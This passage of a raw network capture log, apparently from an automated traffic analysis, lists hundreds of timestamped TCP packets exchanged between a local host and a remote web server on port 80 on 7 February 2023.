                                                                                    Feb 7, 2023 19:45:01.737662077 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.737690926 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.737720966 CET4969980192.168.2.3188.114.96.3
                                                                                    Feb 7, 2023 19:45:01.737720966 CET4969980192.168.2.3188.114.96.3
                                                                                    Feb 7, 2023 19:45:01.737720966 CET4969980192.168.2.3188.114.96.3
                                                                                    Feb 7, 2023 19:45:01.737739086 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.737767935 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.738126040 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.738157034 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.738185883 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.738207102 CET4969980192.168.2.3188.114.96.3
                                                                                    Feb 7, 2023 19:45:01.738230944 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.738260031 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.738306999 CET4969980192.168.2.3188.114.96.3
                                                                                    Feb 7, 2023 19:45:01.738343000 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.738375902 CET4969980192.168.2.3188.114.96.3
                                                                                    Feb 7, 2023 19:45:01.738421917 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.738451004 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.738481045 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.738507986 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.738537073 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.738565922 CET4969980192.168.2.3188.114.96.3
                                                                                    Feb 7, 2023 19:45:01.738565922 CET4969980192.168.2.3188.114.96.3
                                                                                    Feb 7, 2023 19:45:01.738583088 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.738635063 CET4969980192.168.2.3188.114.96.3
                                                                                    Feb 7, 2023 19:45:01.738738060 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.738765001 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.738794088 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.738822937 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.738853931 CET4969980192.168.2.3188.114.96.3
                                                                                    Feb 7, 2023 19:45:01.738853931 CET4969980192.168.2.3188.114.96.3
                                                                                    Feb 7, 2023 19:45:01.738867998 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.738895893 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.738924980 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.738951921 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.738965034 CET4969980192.168.2.3188.114.96.3
                                                                                    Feb 7, 2023 19:45:01.738991976 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.739021063 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.739048958 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.739062071 CET4969980192.168.2.3188.114.96.3
                                                                                    Feb 7, 2023 19:45:01.739062071 CET4969980192.168.2.3188.114.96.3
                                                                                    Feb 7, 2023 19:45:01.739092112 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.739166975 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.739196062 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.739212990 CET4969980192.168.2.3188.114.96.3
                                                                                    Feb 7, 2023 19:45:01.739236116 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.739264011 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.739291906 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.739320040 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.739350080 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.739378929 CET4969980192.168.2.3188.114.96.3
                                                                                    Feb 7, 2023 19:45:01.739378929 CET4969980192.168.2.3188.114.96.3
                                                                                    Feb 7, 2023 19:45:01.739727020 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.739772081 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.739808083 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.739834070 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.739861012 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.739892006 CET4969980192.168.2.3188.114.96.3
                                                                                    Feb 7, 2023 19:45:01.739892006 CET4969980192.168.2.3188.114.96.3
                                                                                    Feb 7, 2023 19:45:01.739907026 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.739939928 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.739972115 CET4969980192.168.2.3188.114.96.3
                                                                                    Feb 7, 2023 19:45:01.740025997 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.740196943 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.740225077 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.740255117 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.740286112 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.740314960 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.740341902 CET4969980192.168.2.3188.114.96.3
                                                                                    Feb 7, 2023 19:45:01.740341902 CET4969980192.168.2.3188.114.96.3
                                                                                    Feb 7, 2023 19:45:01.740341902 CET4969980192.168.2.3188.114.96.3
                                                                                    Feb 7, 2023 19:45:01.740367889 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.740408897 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.740447044 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.740473986 CET4969980192.168.2.3188.114.96.3
                                                                                    Feb 7, 2023 19:45:01.740499020 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.740535021 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.740554094 CET4969980192.168.2.3188.114.96.3
                                                                                    Feb 7, 2023 19:45:01.740585089 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.740700006 CET4969980192.168.2.3188.114.96.3
                                                                                    Feb 7, 2023 19:45:01.740761995 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.740797043 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.740861893 CET4969980192.168.2.3188.114.96.3
                                                                                    Feb 7, 2023 19:45:01.740932941 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.740964890 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.740998030 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.741031885 CET4969980192.168.2.3188.114.96.3
                                                                                    Feb 7, 2023 19:45:01.741091967 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.741125107 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.741158962 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.741194010 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.741226912 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.741256952 CET4969980192.168.2.3188.114.96.3
                                                                                    Feb 7, 2023 19:45:01.741256952 CET4969980192.168.2.3188.114.96.3
                                                                                    Feb 7, 2023 19:45:01.741256952 CET4969980192.168.2.3188.114.96.3
                                                                                    Feb 7, 2023 19:45:01.741286039 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.741316080 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.741353035 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.741363049 CET4969980192.168.2.3188.114.96.3
                                                                                    Feb 7, 2023 19:45:01.741395950 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.741429090 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.741460085 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.741492987 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.741527081 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.741543055 CET4969980192.168.2.3188.114.96.3
                                                                                    Feb 7, 2023 19:45:01.741575956 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.741679907 CET4969980192.168.2.3188.114.96.3
                                                                                    Feb 7, 2023 19:45:01.746740103 CET4969980192.168.2.3188.114.96.3
                                                                                    Feb 7, 2023 19:45:01.748550892 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.748594046 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.748626947 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.748657942 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.748684883 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.748713017 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.748742104 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.748774052 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.748805046 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.748835087 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.748869896 CET4969980192.168.2.3188.114.96.3
                                                                                    Feb 7, 2023 19:45:01.748869896 CET4969980192.168.2.3188.114.96.3
                                                                                    Feb 7, 2023 19:45:01.748869896 CET4969980192.168.2.3188.114.96.3
                                                                                    Feb 7, 2023 19:45:01.748898983 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.748931885 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.749003887 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.749037027 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.749068975 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.749098063 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.749130964 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.749541044 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.749579906 CET4969980192.168.2.3188.114.96.3
                                                                                    Feb 7, 2023 19:45:01.749579906 CET4969980192.168.2.3188.114.96.3
                                                                                    Feb 7, 2023 19:45:01.749579906 CET4969980192.168.2.3188.114.96.3
                                                                                    Feb 7, 2023 19:45:01.749603987 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.749636889 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.749667883 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.749696970 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.749730110 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.749763012 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.749793053 CET4969980192.168.2.3188.114.96.3
                                                                                    Feb 7, 2023 19:45:01.749793053 CET4969980192.168.2.3188.114.96.3
                                                                                    Feb 7, 2023 19:45:01.749793053 CET4969980192.168.2.3188.114.96.3
                                                                                    Feb 7, 2023 19:45:01.749821901 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.749850988 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.749881983 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.749916077 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.749948978 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.749978065 CET4969980192.168.2.3188.114.96.3
                                                                                    Feb 7, 2023 19:45:01.749978065 CET4969980192.168.2.3188.114.96.3
                                                                                    Feb 7, 2023 19:45:01.749978065 CET4969980192.168.2.3188.114.96.3
                                                                                    Feb 7, 2023 19:45:01.750004053 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.750036955 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.750067949 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.750101089 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.750132084 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.750169992 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.750202894 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.750232935 CET4969980192.168.2.3188.114.96.3
                                                                                    Feb 7, 2023 19:45:01.750232935 CET4969980192.168.2.3188.114.96.3
                                                                                    Feb 7, 2023 19:45:01.750232935 CET4969980192.168.2.3188.114.96.3
                                                                                    Feb 7, 2023 19:45:01.750261068 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.750292063 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.750323057 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.750353098 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.750384092 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.750413895 CET4969980192.168.2.3188.114.96.3
                                                                                    Feb 7, 2023 19:45:01.750413895 CET4969980192.168.2.3188.114.96.3
                                                                                    Feb 7, 2023 19:45:01.750413895 CET4969980192.168.2.3188.114.96.3
                                                                                    Feb 7, 2023 19:45:01.750443935 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.750474930 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.750509024 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.750540972 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.750574112 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.750607967 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.750642061 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.750674963 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.750711918 CET4969980192.168.2.3188.114.96.3
                                                                                    Feb 7, 2023 19:45:01.750711918 CET4969980192.168.2.3188.114.96.3
                                                                                    Feb 7, 2023 19:45:01.750711918 CET4969980192.168.2.3188.114.96.3
                                                                                    Feb 7, 2023 19:45:01.750751972 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.750786066 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.750818968 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.750852108 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.750884056 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.750916004 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.750962973 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.751033068 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.751091957 CET4969980192.168.2.3188.114.96.3
                                                                                    Feb 7, 2023 19:45:01.751091957 CET4969980192.168.2.3188.114.96.3
                                                                                    Feb 7, 2023 19:45:01.751091957 CET4969980192.168.2.3188.114.96.3
                                                                                    Feb 7, 2023 19:45:01.751127005 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.751163006 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.751197100 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.751230955 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.751266003 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.751297951 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.751327991 CET4969980192.168.2.3188.114.96.3
                                                                                    Feb 7, 2023 19:45:01.751327991 CET4969980192.168.2.3188.114.96.3
                                                                                    Feb 7, 2023 19:45:01.751327991 CET4969980192.168.2.3188.114.96.3
                                                                                    Feb 7, 2023 19:45:01.751357079 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.751389027 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.751422882 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.751455069 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.751490116 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.751523972 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.751564980 CET4969980192.168.2.3188.114.96.3
                                                                                    Feb 7, 2023 19:45:01.751564980 CET4969980192.168.2.3188.114.96.3
                                                                                    Feb 7, 2023 19:45:01.751564980 CET4969980192.168.2.3188.114.96.3
                                                                                    Feb 7, 2023 19:45:01.751813889 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.751847982 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.751904011 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.751934052 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.751967907 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.752000093 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.752032042 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.752064943 CET4969980192.168.2.3188.114.96.3
                                                                                    Feb 7, 2023 19:45:01.752064943 CET4969980192.168.2.3188.114.96.3
                                                                                    Feb 7, 2023 19:45:01.752064943 CET4969980192.168.2.3188.114.96.3
                                                                                    Feb 7, 2023 19:45:01.752091885 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.752125978 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.752161980 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.752197981 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.752233028 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.752268076 CET4969980192.168.2.3188.114.96.3
                                                                                    Feb 7, 2023 19:45:01.752268076 CET4969980192.168.2.3188.114.96.3
                                                                                    Feb 7, 2023 19:45:01.752268076 CET4969980192.168.2.3188.114.96.3
                                                                                    Feb 7, 2023 19:45:01.752294064 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.752326012 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.752362013 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.752397060 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.752433062 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.752466917 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.752501965 CET4969980192.168.2.3188.114.96.3
                                                                                    Feb 7, 2023 19:45:01.752501965 CET4969980192.168.2.3188.114.96.3
                                                                                    Feb 7, 2023 19:45:01.752501965 CET4969980192.168.2.3188.114.96.3
                                                                                    Feb 7, 2023 19:45:01.752526999 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.752873898 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.752908945 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.752947092 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.752984047 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.753020048 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.753057957 CET4969980192.168.2.3188.114.96.3
                                                                                    Feb 7, 2023 19:45:01.753057957 CET4969980192.168.2.3188.114.96.3
                                                                                    Feb 7, 2023 19:45:01.753057957 CET4969980192.168.2.3188.114.96.3
                                                                                    Feb 7, 2023 19:45:01.753082991 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.753119946 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.753170013 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.753206015 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.754152060 CET4969980192.168.2.3188.114.96.3
                                                                                    Feb 7, 2023 19:45:01.754153013 CET4969980192.168.2.3188.114.96.3
                                                                                    Feb 7, 2023 19:45:01.758749962 CET4969980192.168.2.3188.114.96.3
                                                                                    Feb 7, 2023 19:45:01.771867990 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.771912098 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.771936893 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.772002935 CET4969980192.168.2.3188.114.96.3
                                                                                    Feb 7, 2023 19:45:01.772188902 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.772295952 CET4969980192.168.2.3188.114.96.3
                                                                                    Feb 7, 2023 19:45:01.772336006 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.772357941 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.772804976 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.772842884 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.772869110 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.772896051 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.772924900 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.772958994 CET4969980192.168.2.3188.114.96.3
                                                                                    Feb 7, 2023 19:45:01.772958994 CET4969980192.168.2.3188.114.96.3
                                                                                    Feb 7, 2023 19:45:01.772958994 CET4969980192.168.2.3188.114.96.3
                                                                                    Feb 7, 2023 19:45:01.772979021 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.773008108 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.773035049 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.773062944 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.773088932 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.773114920 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.773143053 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.773174047 CET4969980192.168.2.3188.114.96.3
                                                                                    Feb 7, 2023 19:45:01.773174047 CET4969980192.168.2.3188.114.96.3
                                                                                    Feb 7, 2023 19:45:01.773174047 CET4969980192.168.2.3188.114.96.3
                                                                                    Feb 7, 2023 19:45:01.773196936 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.773226023 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.773255110 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.773286104 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.773313999 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.773344040 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.773372889 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.773403883 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.773432970 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.773447990 CET4969980192.168.2.3188.114.96.3
                                                                                    Feb 7, 2023 19:45:01.773447990 CET4969980192.168.2.3188.114.96.3
                                                                                    Feb 7, 2023 19:45:01.773478031 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.773504972 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.773530960 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.773557901 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.773628950 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.773649931 CET4969980192.168.2.3188.114.96.3
                                                                                    Feb 7, 2023 19:45:01.773649931 CET4969980192.168.2.3188.114.96.3
                                                                                    Feb 7, 2023 19:45:01.773684025 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.773713112 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.773732901 CET4969980192.168.2.3188.114.96.3
                                                                                    Feb 7, 2023 19:45:01.773755074 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.773782969 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.773813963 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.773844004 CET4969980192.168.2.3188.114.96.3
                                                                                    Feb 7, 2023 19:45:01.773844957 CET4969980192.168.2.3188.114.96.3
                                                                                    Feb 7, 2023 19:45:01.773875952 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.773905039 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.773917913 CET4969980192.168.2.3188.114.96.3
                                                                                    Feb 7, 2023 19:45:01.773945093 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.773978949 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.773987055 CET4969980192.168.2.3188.114.96.3
                                                                                    Feb 7, 2023 19:45:01.774014950 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.774048090 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.774056911 CET4969980192.168.2.3188.114.96.3
                                                                                    Feb 7, 2023 19:45:01.774084091 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.774111032 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.774130106 CET4969980192.168.2.3188.114.96.3
                                                                                    Feb 7, 2023 19:45:01.774154902 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.774189949 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.774220943 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.774238110 CET4969980192.168.2.3188.114.96.3
                                                                                    Feb 7, 2023 19:45:01.774270058 CET4969980192.168.2.3188.114.96.3
                                                                                    Feb 7, 2023 19:45:01.774283886 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.774315119 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.774348021 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.774373055 CET4969980192.168.2.3188.114.96.3
                                                                                    Feb 7, 2023 19:45:01.774393082 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.774420023 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.774446964 CET8049699188.114.96.3192.168.2.3
